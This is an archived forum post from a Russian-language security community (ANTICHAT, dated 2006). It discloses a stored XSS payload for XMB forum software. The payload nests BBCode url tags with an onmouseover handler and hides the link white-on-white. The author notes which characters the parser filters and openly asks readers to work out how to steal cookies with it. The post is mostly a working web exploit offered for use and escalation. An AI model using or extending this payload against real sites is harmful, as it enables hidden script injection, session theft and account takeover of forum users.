ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
02.10.2006, 15:41
|
|
Познающий
Регистрация: 14.07.2006
Сообщений: 85
Провел на форуме:
72678
Репутация:
31
|
|
XMB last ver. XSS
В последних XMB нашёл XSS, как нарыть куки с помощью этого дела - не сообразил, кто додумается - отпишитесь.
Собственно вот сам код (уберите знак *(звездочка) из тегов):
Код:
[url*][url*= onmouseover=a=String.fromCharCode(40,99,41,32,66,114,97,104,109,97);alert(a) style=`color:#fff;background:#fff;`][/url*][/url*]
Надеюсь вы заметили
Код:
style=`color:#fff;background:#fff;`
С помощью этой чтуки можно изменить стиль текста ссылки, тем самым замаскировать её.
Проверено на IE, Firefox, Opera (8.4) - всё прекрасно работает.
p.s. для тех, кто собирается рыть дальше в этой ХСС сразу скажу - форум не парсит бб теги, если в них присутствует: ' , ".
Парсит: < , >, &=& , =&nbsp;(ыыы)... и т.п. |
|
|
|
Похожие темы
|
| Тема |
Автор |
Раздел |
Ответов |
Последнее сообщение |
|
XSS worms
|
Xex |
Статьи |
0 |
02.10.2006 01:49 |
|
Xss для новичков
|
Micr0b |
Уязвимости |
0 |
04.06.2006 18:25 |
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Древовидный вид